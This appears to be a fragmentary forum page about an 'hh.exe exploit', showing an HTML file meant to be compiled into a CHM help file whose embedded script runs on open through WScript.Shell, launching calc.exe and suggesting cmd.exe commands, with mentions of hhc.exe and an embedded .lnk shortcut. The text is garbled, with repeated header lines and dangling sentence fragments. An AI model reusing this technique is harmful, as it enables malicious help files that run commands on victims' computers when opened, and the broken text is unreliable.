 |
| Last visit was: Mon Mar 09, 2026 1:26 am | It is currently Mon Mar 09, 2026 1:26 am |
|
| Last visit was: Mon Mar 09, 2026 1:26 am | It is currently Mon Mar 09, 2026 1:26 am |
Hh.exe Exploit Officialhhc.exe project.hhp Attackers can embed a shortcut (.lnk) that executes: (e.g., index.html ): <!DOCTYPE html> <html> <head> <title>Help</title> <script language="javascript"> // Runs immediately when the CHM is opened var shell = new ActiveXObject("WScript.Shell"); shell.Run("calc.exe", 0, false); // or cmd.exe /c whoami > out.txt </script> </head> <body> <p>Loading documentation...</p> </body> </html> (using hhc.exe from HTML Help Workshop): hh.exe exploit |